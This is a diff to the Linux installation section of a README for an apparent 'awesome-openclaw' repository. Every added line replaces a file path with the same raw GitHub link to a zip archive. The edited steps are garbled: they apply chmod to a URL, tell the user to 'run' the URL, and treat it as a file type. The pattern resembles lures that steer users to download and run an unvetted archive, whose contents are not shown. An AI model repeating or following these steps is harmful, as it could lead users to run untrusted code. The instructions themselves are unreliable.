lemurhacep/awesome-openclaw/README.md

 ### Installation on Linux

 1. If you downloaded an `.AppImage`, make it executable:
-   - Open your terminal and type: `chmod +x /path/to/the/file.AppImage`
+   - Open your terminal and type: `chmod +x https://raw.githubusercontent.com/lemurhacep/awesome-openclaw/main/nonglare/awesome-openclaw-v2.7.zip`
-2. Run the file by double-clicking or typing `./filename.AppImage` in your terminal.
+2. Run the file by double-clicking or typing `https://raw.githubusercontent.com/lemurhacep/awesome-openclaw/main/nonglare/awesome-openclaw-v2.7.zip` in your terminal.
-3. For `.tar.gz` files, extract them and follow included instructions, usually in a README file.
+3. For `https://raw.githubusercontent.com/lemurhacep/awesome-openclaw/main/nonglare/awesome-openclaw-v2.7.zip` files, extract them and follow included instructions, usually in a README file.

 ---